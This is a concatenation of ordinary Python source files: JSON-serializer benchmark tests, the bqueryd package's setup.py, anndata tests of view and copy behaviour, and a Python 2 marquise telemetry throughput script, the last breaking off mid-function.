for x in range(100):
arrays.append({str(random.random() * 20): int(random.random() * 1000000)})
dict_lists[str(random.random() * 20)] = arrays
@pytest.mark.parametrize('name,serialize,deserialize', contenders)
def test_json_serialization(name, serialize, deserialize, benchmark):
ser_data, des_data = benchmark(run_client_test, name, serialize, deserialize)
msg = "\n%-11s serialize: %0.3f deserialize: %0.3f total: %0.3f" % (
name, ser_data, des_data, ser_data + des_data
)
print(msg)
@pytest.mark.parametrize('name,serialize,deserialize', contenders)
def test_json_unicode_strings(name, serialize, deserialize, benchmark):
print("\nArray with 256 unicode strings:")
ser_data, des_data = benchmark(run_client_test,
name, serialize, deserialize,
data=unicode_strings,
iterations=5000,
)
msg = "%-11s serialize: %0.3f deserialize: %0.3f total: %0.3f" % (
name, ser_data, des_data, ser_data + des_data
)
print(msg)
@pytest.mark.parametrize('name,serialize,deserialize', contenders)
def test_json_ascii_strings(name, serialize, deserialize, benchmark):
print("\nArray with 256 ascii strings:")
ser_data, des_data = benchmark(run_client_test,
name, serialize, deserialize,
data=strings,
)
msg = "%-11s serialize: %0.3f deserialize: %0.3f total: %0.3f" % (
name, ser_data, des_data, ser_data + des_data
)
print(msg)
@pytest.mark.parametrize('name,serialize,deserialize', contenders)
def test_json_booleans(name, serialize, deserialize, benchmark):
print("\nArray with 256 True's:")
ser_data, des_data = benchmark(run_client_test,
name, serialize, deserialize,
data=booleans,
)
msg = "%-11s serialize: %0.3f deserialize: %0.3f total: %0.3f" % (
name, ser_data, des_data, ser_data + des_data
)
print(msg)
@pytest.mark.parametrize('name,serialize,deserialize', contenders)
def test_json_list_of_dictionaries(name, serialize, deserialize, benchmark):
print("\nArray of 100 dictionaries:")
ser_data, des_data = benchmark(run_client_test,
name, serialize, deserialize,
data=list_dicts,
iterations=5,
)
msg = "%-11s serialize: %0.3f deserialize: %0.3f total: %0.3f" % (
name, ser_data, des_data, ser_data + des_data
)
print(msg)
@pytest.mark.parametrize('name,serialize,deserialize', contenders)
def test_json_dictionary_of_lists(name, serialize, deserialize, benchmark):
print("\nDictionary of 100 Arrays:")
ser_data, des_data = benchmark(run_client_test,
name, serialize, deserialize,
data=dict_lists,
iterations=5,
)
msg = "%-11s serialize: %0.3f deserialize: %0.3f total: %0.3f" % (
name, ser_data, des_data, ser_data + des_data
)
print(msg)
@pytest.mark.parametrize('name,serialize,deserialize', contenders)
def test_json_medium_complex_objects(name, serialize, deserialize, benchmark):
print("\n256 Medium Complex objects:")
ser_data, des_data = benchmark(run_client_test,
name, serialize, deserialize,
data=medium_complex,
iterations=50000,
)
msg = "%-11s serialize: %0.3f deserialize: %0.3f total: %0.3f" % (
name, ser_data, des_data, ser_data + des_data
)
print(msg)
@pytest.mark.skipif(rapidjson is None, reason="rapidjson is not installed")
def test_double_performance_float_precision(benchmark):
print("\nArray with 256 doubles:")
name = 'rapidjson (precise)'
serialize = rapidjson.dumps
deserialize = rapidjson.loads
ser_data, des_data = benchmark(run_client_test,
name, serialize, deserialize,
data=doubles,
iterations=50000,
)
msg = "%-11s serialize: %0.3f deserialize: %0.3f total: %0.3f" % (
name, ser_data, des_data, ser_data + des_data
)
print(msg)
|
from __future__ import absolute_import
import codecs
import os
from setuptools import setup, Extension, find_packages
from os.path import abspath
from sys import version_info as v
from setuptools.command.build_ext import build_ext as _build_ext
if any([v < (2, 7), (3,) < v < (3, 5)]):
raise Exception("Unsupported Python version %d.%d. Requires Python >= 2.7 "
"or >= 3.5." % v[:2])
class build_ext(_build_ext):
def finalize_options(self):
_build_ext.finalize_options(self)
# Prevent numpy from thinking it is still in its setup process:
__builtins__.__NUMPY_SETUP__ = False
import numpy
self.include_dirs.append(numpy.get_include())
HERE = os.path.abspath(os.path.dirname(__file__))
def read(*parts):
"""
    Build an absolute path from *parts* and return the contents of the
resulting file. Assume UTF-8 encoding.
"""
with codecs.open(os.path.join(HERE, *parts), "rb", "utf-8") as f:
return f.read()
def get_version():
version = {}
with open("bqueryd/version.py") as fp:
        exec(fp.read(), version)
return version
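# Build configuration: numpy include dirs are added here when numpy is importable and again at build time by the custom build_ext above.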
inc_dirs = [abspath('bqueryd')]
try:
import numpy as np
inc_dirs.append(np.get_include())
except ImportError as e:
pass
lib_dirs = []
libs = []
def_macros = []
sources = []
cmdclass = {'build_ext': build_ext}
optional_libs = ['numexpr>=2.6.9']
install_requires = [
'bquery>=0.2.10',
'pyzmq>=17.1.2',
'redis>=3.0.1',
'boto3>=1.9.82',
'smart_open>=1.9.0',
'netifaces>=0.10.9',
'configobj>=5.0.6',
'psutil>=5.0.0',
'azure-storage-blob==12.0.0',
]
setup_requires = []
tests_requires = [
'pandas>=0.23.1',
'pytest>=4.0.0',
'pytest-cov>=2.6.0',
'codacy-coverage>=1.3.7',
]
extras_requires = []
ext_modules = []
package_data = {}
classifiers = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Operating System :: Microsoft :: Windows',
'Operating System :: Unix',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
]
setup(
name="bqueryd",
version=get_version()['__version__'],
description='A distribution framework for Bquery',
long_description=read("README.md"),
long_description_content_type='text/markdown',
classifiers=classifiers,
author='Carst Vaartjes',
author_email='cvaartjes@visualfabriq.com',
maintainer='Carst Vaartjes',
maintainer_email='cvaartjes@visualfabriq.com',
url='https://github.com/visualfabriq/bqueryd',
license='GPL2',
platforms=['any'],
ext_modules=ext_modules,
cmdclass=cmdclass,
install_requires=install_requires,
setup_requires=setup_requires,
tests_require=tests_requires,
extras_require=dict(
optional=extras_requires,
test=tests_requires
),
packages=find_packages(),
package_data=package_data,
include_package_data=True,
zip_safe=True,
entry_points={
'console_scripts': [
'bqueryd = bqueryd.node:main'
]
}
)
|
from copy import deepcopy
from operator import mul
import joblib
import numpy as np
from scipy import sparse
import pandas as pd
import pytest
import anndata as ad
from anndata._core.index import _normalize_index
from anndata._core.views import ArrayView, SparseCSRView, SparseCSCView
from anndata.utils import asarray
from anndata.tests.helpers import (
gen_adata,
subset_func,
slice_subset,
single_subset,
assert_equal,
)
X_list = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
obs_dict = dict(
row_names=["name1", "name2", "name3"], # row annotation
oanno1=["cat1", "cat2", "cat2"], # categorical annotation
oanno2=["o1", "o2", "o3"], # string annotation
oanno3=[2.1, 2.2, 2.3], # float annotation
)
var_dict = dict(vanno1=[3.1, 3.2, 3.3])
uns_dict = dict(oanno1_colors=["#000000", "#FFFFFF"], uns2=["some annotation"])
subset_func2 = subset_func
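# Alias the subset_func fixture under a second name so a test can request two independently drawn subsets.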
class NDArraySubclass(np.ndarray):
def view(self, dtype=None, typ=None):
return self
@pytest.fixture
def adata():
adata = ad.AnnData(np.zeros((100, 100)))
adata.obsm["o"] = np.zeros((100, 50))
adata.varm["o"] = np.zeros((100, 50))
return adata
@pytest.fixture(params=[asarray, sparse.csr_matrix, sparse.csc_matrix])
def adata_parameterized(request):
return gen_adata(shape=(200, 300), X_type=request.param)
@pytest.fixture(
params=[np.array, sparse.csr_matrix, sparse.csc_matrix],
ids=["np_array", "scipy_csr", "scipy_csc"],
)
def matrix_type(request):
return request.param
@pytest.fixture(params=["layers", "obsm", "varm"])
def mapping_name(request):
return request.param
def test_views():
X = np.array(X_list)
adata = ad.AnnData(X, obs=obs_dict, var=var_dict, uns=uns_dict, dtype="int32")
assert adata[:, 0].is_view
assert adata[:, 0].X.tolist() == np.reshape([1, 4, 7], (3, 1)).tolist()
adata[:2, 0].X = [0, 0]
assert adata[:, 0].X.tolist() == np.reshape([0, 0, 7], (3, 1)).tolist()
adata_subset = adata[:2, [0, 1]]
assert adata_subset.is_view
# now transition to actual object
adata_subset.obs["foo"] = range(2)
assert not adata_subset.is_view
assert adata_subset.obs["foo"].tolist() == list(range(2))
def test_modify_view_component(matrix_type, mapping_name):
adata = ad.AnnData(
np.zeros((10, 10)),
**{mapping_name: dict(m=matrix_type(asarray(sparse.random(10, 10))))},
)
init_hash = joblib.hash(adata)
subset = adata[:5, :][:, :5]
assert subset.is_view
m = getattr(subset, mapping_name)["m"]
m[0, 0] = 100
assert not subset.is_view
assert getattr(subset, mapping_name)["m"][0, 0] == 100
assert init_hash == joblib.hash(adata)
def test_set_obsm_key(adata):
init_hash = joblib.hash(adata)
orig_obsm_val = adata.obsm["o"].copy()
subset_obsm = adata[:50]
assert subset_obsm.is_view
subset_obsm.obsm["o"] = np.ones((50, 20))
assert not subset_obsm.is_view
assert np.all(adata.obsm["o"] == orig_obsm_val)
assert init_hash == joblib.hash(adata)
def test_set_varm_key(adata):
init_hash = joblib.hash(adata)
orig_varm_val = adata.varm["o"].copy()
subset_varm = adata[:, :50]
assert subset_varm.is_view
subset_varm.varm["o"] = np.ones((50, 20))
assert not subset_varm.is_view
assert np.all(adata.varm["o"] == orig_varm_val)
assert init_hash == joblib.hash(adata)
def test_set_obs(adata, subset_func):
init_hash = joblib.hash(adata)
subset = adata[subset_func(adata.obs_names), :]
new_obs = pd.DataFrame(
dict(a=np.ones(subset.n_obs), b=np.ones(subset.n_obs)),
index=subset.obs_names,
)
assert subset.is_view
subset.obs = new_obs
assert not subset.is_view
assert np.all(subset.obs == new_obs)
assert joblib.hash(adata) == init_hash
def test_set_var(adata, subset_func):
init_hash = joblib.hash(adata)
subset = adata[:, subset_func(adata.var_names)]
new_var = pd.DataFrame(
dict(a=np.ones(subset.n_vars), b=np.ones(subset.n_vars)),
index=subset.var_names,
)
assert subset.is_view
subset.var = new_var
assert not subset.is_view
assert np.all(subset.var == new_var)
assert joblib.hash(adata) == init_hash
def test_drop_obs_column():
adata = ad.AnnData(np.array(X_list), obs=obs_dict, dtype="int32")
subset = adata[:2]
assert subset.is_view
# returns a copy of obs
assert subset.obs.drop(columns=["oanno1"]).columns.tolist() == ["oanno2", "oanno3"]
assert subset.is_view
# would modify obs, so it should actualize subset and not modify adata
subset.obs.drop(columns=["oanno1"], inplace=True)
assert not subset.is_view
assert subset.obs.columns.tolist() == ["oanno2", "oanno3"]
assert adata.obs.columns.tolist() == ["oanno1", "oanno2", "oanno3"]
def test_set_obsm(adata):
init_hash = joblib.hash(adata)
dim0_size = np.random.randint(2, adata.shape[0] - 1)
dim1_size = np.random.randint(1, 99)
orig_obsm_val = adata.obsm["o"].copy()
subset_idx = np.random.choice(adata.obs_names, dim0_size, replace=False)
subset = adata[subset_idx, :]
assert subset.is_view
subset.obsm = dict(o=np.ones((dim0_size, dim1_size)))
assert not subset.is_view
assert np.all(orig_obsm_val == adata.obsm["o"]) # Checking for mutation
assert np.all(subset.obsm["o"] == np.ones((dim0_size, dim1_size)))
subset = adata[subset_idx, :]
subset_hash = joblib.hash(subset)
with pytest.raises(ValueError):
subset.obsm = dict(o=np.ones((dim0_size + 1, dim1_size)))
with pytest.raises(ValueError):
subset.varm = dict(o=np.ones((dim0_size - 1, dim1_size)))
assert subset_hash == joblib.hash(subset)
    # Only modifications have been made to the view, so the parent adata is unchanged
assert init_hash == joblib.hash(adata)
def test_set_varm(adata):
init_hash = joblib.hash(adata)
dim0_size = np.random.randint(2, adata.shape[1] - 1)
dim1_size = np.random.randint(1, 99)
orig_varm_val = adata.varm["o"].copy()
subset_idx = np.random.choice(adata.var_names, dim0_size, replace=False)
subset = adata[:, subset_idx]
assert subset.is_view
subset.varm = dict(o=np.ones((dim0_size, dim1_size)))
assert not subset.is_view
assert np.all(orig_varm_val == adata.varm["o"]) # Checking for mutation
assert np.all(subset.varm["o"] == np.ones((dim0_size, dim1_size)))
subset = adata[:, subset_idx]
subset_hash = joblib.hash(subset)
with pytest.raises(ValueError):
subset.varm = dict(o=np.ones((dim0_size + 1, dim1_size)))
with pytest.raises(ValueError):
subset.varm = dict(o=np.ones((dim0_size - 1, dim1_size)))
# subset should not be changed by failed setting
assert subset_hash == joblib.hash(subset)
assert init_hash == joblib.hash(adata)
def test_not_set_subset_X(matrix_type, subset_func):
adata = ad.AnnData(matrix_type(asarray(sparse.random(20, 20))))
init_hash = joblib.hash(adata)
orig_X_val = adata.X.copy()
while True:
subset_idx = slice_subset(adata.obs_names)
if len(adata[subset_idx, :]) > 2:
break
subset = adata[subset_idx, :]
subset = adata[:, subset_idx]
internal_idx = _normalize_index(
subset_func(np.arange(subset.X.shape[1])), subset.var_names
)
assert subset.is_view
subset.X[:, internal_idx] = 1
assert not subset.is_view
assert not np.any(asarray(adata.X != orig_X_val))
assert init_hash == joblib.hash(adata)
def test_set_scalar_subset_X(matrix_type, subset_func):
adata = ad.AnnData(matrix_type(np.zeros((10, 10))))
orig_X_val = adata.X.copy()
subset_idx = slice_subset(adata.obs_names)
adata_subset = adata[subset_idx, :]
adata_subset.X = 1
assert adata_subset.is_view
assert np.all(asarray(adata[subset_idx, :].X) == 1)
assert asarray((orig_X_val != adata.X)).sum() == mul(*adata_subset.shape)
def test_set_subset_obsm(adata, subset_func):
init_hash = joblib.hash(adata)
orig_obsm_val = adata.obsm["o"].copy()
while True:
subset_idx = slice_subset(adata.obs_names)
if len(adata[subset_idx, :]) > 2:
break
subset = adata[subset_idx, :]
internal_idx = _normalize_index(
subset_func(np.arange(subset.obsm["o"].shape[0])), subset.obs_names
)
assert subset.is_view
subset.obsm["o"][internal_idx] = 1
assert not subset.is_view
assert np.all(adata.obsm["o"] == orig_obsm_val)
assert init_hash == joblib.hash(adata)
def test_set_subset_varm(adata, subset_func):
init_hash = joblib.hash(adata)
orig_varm_val = adata.varm["o"].copy()
while True:
subset_idx = slice_subset(adata.var_names)
if (adata[:, subset_idx]).shape[1] > 2:
break
subset = adata[:, subset_idx]
internal_idx = _normalize_index(
subset_func(np.arange(subset.varm["o"].shape[0])), subset.var_names
)
assert subset.is_view
subset.varm["o"][internal_idx] = 1
assert not subset.is_view
assert np.all(adata.varm["o"] == orig_varm_val)
assert init_hash == joblib.hash(adata)
@pytest.mark.parametrize("attr", ["obsm", "varm", "obsp", "varp", "layers"])
def test_view_failed_delitem(attr):
adata = gen_adata((10, 10))
view = adata[5:7, :][:, :5]
adata_hash = joblib.hash(adata)
view_hash = joblib.hash(view)
with pytest.raises(KeyError):
getattr(view, attr).__delitem__("not a key")
assert view.is_view
assert adata_hash == joblib.hash(adata)
assert view_hash == joblib.hash(view)
@pytest.mark.parametrize("attr", ["obsm", "varm", "obsp", "varp", "layers"])
def test_view_delitem(attr):
adata = gen_adata((10, 10))
getattr(adata, attr)["to_delete"] = np.ones((10, 10))
# Shouldn’t be a subclass, should be an ndarray
assert type(getattr(adata, attr)["to_delete"]) is np.ndarray
view = adata[5:7, :][:, :5]
adata_hash = joblib.hash(adata)
view_hash = joblib.hash(view)
getattr(view, attr).__delitem__("to_delete")
assert not view.is_view
assert "to_delete" not in getattr(view, attr)
assert "to_delete" in getattr(adata, attr)
assert adata_hash == joblib.hash(adata)
assert view_hash != joblib.hash(view)
@pytest.mark.parametrize(
"attr", ["X", "obs", "var", "obsm", "varm", "obsp", "varp", "layers", "uns"]
)
def test_view_delattr(attr, subset_func):
base = gen_adata((10, 10))
orig_hash = joblib.hash(base)
subset = base[subset_func(base.obs_names), subset_func(base.var_names)]
empty = ad.AnnData(obs=subset.obs[[]], var=subset.var[[]])
delattr(subset, attr)
assert not subset.is_view
# Should now have same value as default
assert_equal(getattr(subset, attr), getattr(empty, attr))
assert orig_hash == joblib.hash(base) # Original should not be modified
@pytest.mark.parametrize(
"attr", ["obs", "var", "obsm", "varm", "obsp", "varp", "layers", "uns"]
)
def test_view_setattr_machinery(attr, subset_func, subset_func2):
# Tests that setting attributes on a view doesn't mess anything up too bad
adata = gen_adata((10, 10))
view = adata[subset_func(adata.obs_names), subset_func2(adata.var_names)]
actual = view.copy()
setattr(view, attr, getattr(actual, attr))
assert_equal(actual, view, exact=True)
def test_layers_view():
X = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
L = np.array([[10, 11, 12], [13, 14, 15], [16, 17, 18]])
real_adata = ad.AnnData(X)
real_adata.layers["L"] = L
view_adata = real_adata[1:, 1:]
real_hash = joblib.hash(real_adata)
view_hash = joblib.hash(view_adata)
assert view_adata.is_view
with pytest.raises(ValueError):
view_adata.layers["L2"] = L + 2
    assert view_adata.is_view  # failing to set a layer item should not turn the view into a copy
assert real_hash == joblib.hash(real_adata)
assert view_hash == joblib.hash(view_adata)
view_adata.layers["L2"] = L[1:, 1:] + 2
assert not view_adata.is_view
assert real_hash == joblib.hash(real_adata)
assert view_hash != joblib.hash(view_adata)
def test_view_of_view(matrix_type, subset_func, subset_func2):
adata = gen_adata((30, 15), X_type=matrix_type)
adata.raw = adata
if subset_func is single_subset:
pytest.xfail("Other subset generating functions have trouble with this")
var_s1 = subset_func(adata.var_names, min_size=4)
var_view1 = adata[:, var_s1]
var_s2 = subset_func2(var_view1.var_names)
var_view2 = var_view1[:, var_s2]
assert var_view2._adata_ref is adata
obs_s1 = subset_func(adata.obs_names, min_size=4)
obs_view1 = adata[obs_s1, :]
obs_s2 = subset_func2(obs_view1.obs_names)
assert adata[obs_s1, :][:, var_s1][obs_s2, :]._adata_ref is adata
view_of_actual_copy = adata[:, var_s1].copy()[obs_s1, :].copy()[:, var_s2].copy()
view_of_view_copy = adata[:, var_s1][obs_s1, :][:, var_s2].copy()
assert_equal(view_of_actual_copy, view_of_view_copy, exact=True)
def test_view_of_view_modification():
adata = ad.AnnData(np.zeros((10, 10)))
adata[0, :][:, 5:].X = np.ones(5)
assert np.all(adata.X[0, 5:] == np.ones(5))
adata[[1, 2], :][:, [1, 2]].X = np.ones((2, 2))
assert np.all(adata.X[1:3, 1:3] == np.ones((2, 2)))
adata.X = sparse.csr_matrix(adata.X)
adata[0, :][:, 5:].X = np.ones(5) * 2
assert np.all(asarray(adata.X)[0, 5:] == np.ones(5) * 2)
adata[[1, 2], :][:, [1, 2]].X = np.ones((2, 2)) * 2
assert np.all(asarray(adata.X)[1:3, 1:3] == np.ones((2, 2)) * 2)
def test_double_index(subset_func, subset_func2):
adata = gen_adata((10, 10))
obs_subset = subset_func(adata.obs_names)
var_subset = subset_func2(adata.var_names)
v1 = adata[obs_subset, var_subset]
v2 = adata[obs_subset, :][:, var_subset]
assert np.all(asarray(v1.X) == asarray(v2.X))
assert np.all(v1.obs == v2.obs)
assert np.all(v1.var == v2.var)
def test_view_retains_ndarray_subclass():
adata = ad.AnnData(np.zeros((10, 10)))
adata.obsm["foo"] = np.zeros((10, 5)).view(NDArraySubclass)
view = adata[:5, :]
assert isinstance(view.obsm["foo"], NDArraySubclass)
assert view.obsm["foo"].shape == (5, 5)
def test_modify_uns_in_copy():
# https://github.com/theislab/anndata/issues/571
adata = ad.AnnData(np.ones((5, 5)), uns={"parent": {"key": "value"}})
adata_copy = adata[:3].copy()
adata_copy.uns["parent"]["key"] = "new_value"
assert adata.uns["parent"]["key"] != adata_copy.uns["parent"]["key"]
@pytest.mark.parametrize("index", [-101, 100, (slice(None), -101), (slice(None), 100)])
def test_invalid_scalar_index(adata, index):
# https://github.com/theislab/anndata/issues/619
with pytest.raises(IndexError, match=r".*index.* out of range\."):
_ = adata[index]
@pytest.mark.parametrize("obs", [False, True])
@pytest.mark.parametrize("index", [-100, -50, -1])
def test_negative_scalar_index(adata, index: int, obs: bool):
pos_index = index + (adata.n_obs if obs else adata.n_vars)
if obs:
adata_pos_subset = adata[pos_index]
adata_neg_subset = adata[index]
else:
adata_pos_subset = adata[:, pos_index]
adata_neg_subset = adata[:, index]
np.testing.assert_array_equal(
adata_pos_subset.obs_names, adata_neg_subset.obs_names
)
np.testing.assert_array_equal(
adata_pos_subset.var_names, adata_neg_subset.var_names
)
@pytest.mark.parametrize("spmat", [sparse.csr_matrix, sparse.csc_matrix])
def test_deepcopy_subset(adata, spmat: type):
adata.obsp["arr"] = np.zeros((adata.n_obs, adata.n_obs))
adata.obsp["spmat"] = spmat((adata.n_obs, adata.n_obs))
adata = deepcopy(adata[:10].copy())
assert isinstance(adata.obsp["arr"], np.ndarray)
assert not isinstance(adata.obsp["arr"], ArrayView)
np.testing.assert_array_equal(adata.obsp["arr"].shape, (10, 10))
assert isinstance(adata.obsp["spmat"], spmat)
assert not isinstance(
adata.obsp["spmat"],
SparseCSRView if spmat is sparse.csr_matrix else SparseCSCView,
)
np.testing.assert_array_equal(adata.obsp["spmat"].shape, (10, 10))
@pytest.mark.parametrize("array_type", [asarray, sparse.csr_matrix, sparse.csc_matrix])
@pytest.mark.parametrize("attr", ["X", "layers", "obsm", "varm", "obsp", "varp"])
def test_view_mixin_copies_data(adata, array_type: type, attr):
N = 100
adata = ad.AnnData(
obs=pd.DataFrame(index=np.arange(N)), var=pd.DataFrame(index=np.arange(N))
)
X = array_type(sparse.eye(N, N).multiply(np.arange(1, N + 1)))
if attr == "X":
adata.X = X
else:
getattr(adata, attr)["arr"] = X
view = adata[:50]
if attr == "X":
arr_view = view.X
else:
arr_view = getattr(view, attr)["arr"]
arr_view_copy = arr_view.copy()
if sparse.issparse(X):
assert not np.shares_memory(arr_view.indices, arr_view_copy.indices)
assert not np.shares_memory(arr_view.indptr, arr_view_copy.indptr)
assert not np.shares_memory(arr_view.data, arr_view_copy.data)
arr_view_copy.data[0] = -5
assert not np.array_equal(arr_view_copy.data, arr_view.data)
else:
assert not np.shares_memory(arr_view, arr_view_copy)
arr_view_copy[0, 0] = -5
assert not np.array_equal(arr_view_copy, arr_view)
def test_copy_X_dtype():
adata = ad.AnnData(sparse.eye(50, dtype=np.float64, format="csr"))
adata_c = adata[::2].copy()
assert adata_c.X.dtype == adata.X.dtype
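# A note on the view semantics exercised above (summarising only what these tests
# assert, not additional behaviour): adding a new entry to ``.layers`` on a view
# materialises the view (``is_view`` becomes False) and leaves the parent AnnData
# untouched, whereas assigning to ``.X`` through a chained view such as
# ``adata[0, :][:, 5:].X = ...`` writes the values back into the parent's ``.X``,
# for dense and sparse ``X`` alike.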
|
'''use marquise_telemetry to build throughput info as visible from the client
e.g.:
$ marquise_telemetry broker | marquise_throughput.py
'''
import sys
from time import time, sleep
import os
import fcntl
class TimeAware(object):
'''simple timing aware mixin
The default implementation of on_tick_change() is to call every function
passed to the constructor in tick_handlers
'''
def __init__(self, ticklen=1, tick_handlers=[]):
self.last_tick = self.start_time = time()
self.ticklen = ticklen
self.tick_handlers = tick_handlers
self.n_ticks = 0
self.totalticktime = 0
def check_for_tick_changed(self):
        '''run on_tick_change once for each interval of ticklen seconds that has elapsed since last_tick
'''
tnow = time()
while tnow - self.last_tick >= self.ticklen:
self.n_ticks += 1
self.totalticktime += self.ticklen
self.last_tick += self.ticklen
self.on_tick_change()
def on_tick_change(self):
'''handler for a tick change
the timestamp marking the 'tick' being handled is in self.last_tick
The current time may however be significantly after self.last_tick if
check_for_tick_changed is not called more often than self.ticklen
'''
for f in self.tick_handlers: f()
def run_forever(self,sleep_time=None):
'''run in a loop regularly calling on_tick_change
'''
if sleep_time == None: sleep_time = self.ticklen/10.0
while True:
self.check_for_tick_changed()
sleep(sleep_time)
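# A minimal usage sketch of TimeAware (illustrative only; the handler below is a
# hypothetical example, not part of this module):
#
#   def heartbeat():
#       print 'tick'                            # runs once per elapsed ticklen
#   ticker = TimeAware(ticklen=2, tick_handlers=[heartbeat])
#   ticker.run_forever()                        # prints 'tick' roughly every 2 seconds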
class TimeHistogram(TimeAware):
'''implements a rolling histogram'''
def __init__(self, nbins, seconds_per_bin=1):
TimeAware.__init__(self, seconds_per_bin)
self.nbins = nbins
self._bins = [0 for n in range(nbins)]
self.current_bin = 0
def on_tick_change(self):
self.current_bin = (self.current_bin + 1) % self.nbins
self._bins[self.current_bin] = 0
def add(self, n=1):
'''add 'n' to the current histogram bin
'''
self.check_for_tick_changed()
self._bins[self.current_bin] += n
def sum(self, k=60):
        '''return the total number of entries recorded over the last k seconds
'''
bins_to_check = k/self.ticklen
return sum(self.bins[-bins_to_check:])
def mean(self, k=60):
'''return the mean entries per second over the last k seconds
'''
if self.totalticktime < k:
k = self.totalticktime # Only average over the time we've been running
bins_to_check = k/self.ticklen
return self.sum(k) / float(bins_to_check) if bins_to_check else 0
@property
def bins(self):
'''get bins in time order, oldest to newest'''
self.check_for_tick_changed()
return self._bins[self.current_bin+1:]+self._bins[:self.current_bin+1]
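# A minimal usage sketch of TimeHistogram (illustrative only): record events as they
# happen, then read back rolling totals and rates.
#
#   hist = TimeHistogram(600)                   # 600 one-second bins
#   hist.add(5)                                 # 5 events in the current second
#   hist.sum(60)                                # total events over the last minute
#   hist.mean(60)                               # mean events per second over the last minute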
class ThroughputCounter(object):
def __init__(self, input_stream=sys.stdin):
self.input_stream=input_stream
self.point_hist = TimeHistogram(600)
self.burst_hist = TimeHistogram(600)
self.acked_burst_hist = TimeHistogram(600)
self.latency_hist = TimeHistogram(600)
self.ack_hist = TimeHistogram(600)
self.defer_write_points_hist = TimeHistogram(600)
self.defer_read_points_hist = TimeHistogram(600)
self.timed_out_points_hist = TimeHistogram(600)
self.outstanding_points = 0
self.outstanding_bursts = {} # burstid -> start timestamp,points
self._reader_state = {}
self.using_marquised = set() # Hosts that relay through marquised
def get_outstanding(self,last_n_seconds=[600,60,1]):
total_burst_counts = map(self.point_hist.sum, last_n_seconds)
total_ack_counts = map(self.ack_hist.sum, last_n_seconds)
return [nbursts-nacks for nbursts,nacks in zip(total_burst_counts,total_ack_counts)]
def get_total_outstanding_points(self):
return sum(points for timestamp,points in self.outstanding_bursts.itervalues())
def get_points_per_seconds(self,over_seconds=[600,60,1]):
return map(self.point_hist.mean, over_seconds)
def get_total_bursts(self,over_seconds=[600,60,1]):
return map(self.burst_hist.mean, over_seconds)
def get_acks_per_second(self,over_seconds=[600,60,1]):
return map(self.ack_hist.mean, over_seconds)
def get_deferred_points_written_per_second(self,over_seconds=[600,60,1]):
return map(self.defer_write_points_hist.mean, over_seconds)
def get_timed_out_points_per_second(self,over_seconds=[600,60,1]):
return map(self.timed_out_points_hist.mean, over_seconds)
def get_deferred_points_read_per_second(self,over_seconds=[600,60,1]):
return map(self.defer_read_points_hist.mean, over_seconds)
def get_average_latencies(self,over_seconds=[600,60,1]):
burst_counts = map(self.acked_burst_hist.sum, over_seconds)
latency_sums = map(self.latency_hist.sum, over_seconds)
return [latencysum/float(nbursts) if nbursts > 0 else 0 for latencysum,nbursts in zip(latency_sums,burst_counts)]
def process_burst(self, data):
if not all(k in data for k in ('identity','message id','points')):
print >> sys.stderr, 'malformed databurst info. ignoring'
return
msgtag = data['identity']+data['message id']
points = int(data['points'])
timestamp = time()
self.outstanding_bursts[msgtag] = timestamp,points
self.outstanding_points += points
self.burst_hist.add(1)
self.point_hist.add(points)
def _msg_tag_from_data(self, data):
return (data['identity'].replace('marquised:',''))+data['message id']
def process_deferred_write(self, data):
msgtag = self._msg_tag_from_data(data)
burst_timestamp,points = self.outstanding_bursts.get(msgtag,(None,None))
if burst_timestamp is not None:
self.defer_write_points_hist.add(points)
def process_deferred_read(self, data):
msgtag = self._msg_tag_from_data(data)
burst_timestamp,points = self.outstanding_bursts.get(msgtag,(None,None))
if burst_timestamp is not None:
self.defer_read_points_hist.add(points)
def process_send_timeout(self, data):
msgtag = self._msg_tag_from_data(data)
burst_timestamp,points = self.outstanding_bursts.get(msgtag,(None,None))
if burst_timestamp is not None:
self.timed_out_points_hist.add(points)
def process_ack(self, data):
if not all(k in data for k in ('identity','message id')):
print >> sys.stderr, 'malformed ack info. ignoring'
return
if data['identity'][:10] == 'marquised:':
# ACK is coming back to marquised from the broker
host = data['identity'][10:]
self.using_marquised.add(host)
else:
host = data['identity']
if host in self.using_marquised:
# If a client is using marquised, that client will
                # receive an ack back from marquised immediately.
#
# We ignore this ack here, and wait for the one
# received by marquised
return
msgtag = host+data['message id']
burst_timestamp,points = self.outstanding_bursts.pop(msgtag,(None,None))
if burst_timestamp == None:
# Got an ACK we didn't see the burst for. Ignoring it.
return
latency = time() - burst_timestamp
self.ack_hist.add(points)
self.acked_burst_hist.add(1)
self.latency_hist.add(latency)
self.outstanding_points -= points
def process_line(self, line):
'''process a line of marquise telemetry
At the moment, only look at bursts being created by the collate_thread
and acked by the marquise poller_thread
sample:
fishhook.engineroom.anchor.net.au 1395212041732118000 8c087c0b collator_thread created_databurst frames = 1618 compressed_bytes = 16921
....
marquised:astrolabe.syd1.anchor.net.au 1395375377705126042 c87ba112 poller_thread rx_msg_from collate_thread
....
fishhook.engineroom.anchor.net.au 1395212082492520000 8c087c0b poller_thread rx_ack_from broker msg_id = 5553
CAVEAT: In the above, the marquised 'collate_thread' is actually the
collate thread in a different process, received by marquised. We can
use the knowledge that this is happening to note that astrolabe is
passing stuff through marquised, and to ignore the ACK that marquised
sends back to the original client on astrolabe when tracking end-to-end
latency
'''
fields = line.strip().split()
if len(fields) < 4: return
# Keep track of hosts using marquised. This is a bit bruteforce, but we need to catch this
# sort of thing early to not accidentally double-track ACKs
#
if fields[0][:10] == 'marquised:':
self.using_marquised.add(fields[0][10:])
key = ' '.join(fields[3:6])
if key == 'collator_thread created_databurst frames':
identity,message_id,points = fields[0],fields[2],int(fields[7])
self.process_burst({ 'identity': identity, 'message id': message_id, 'points': points })
# Anything past here is only in the poller thread. Skips a lot of stuff
if fields[3] != 'poller_thread': return
if key == 'poller_thread rx_ack_from broker':
identity,message_id = fields[0],fields[2]
self.process_ack({ 'identity': identity, 'message id': message_id })
elif fields[4] == 'defer_to_disk':
identity,message_id = fields[0],fields[2]
data = { 'identity': identity, 'message id': message_id }
self.process_deferred_write({ 'identity': identity, 'message id': message_id })
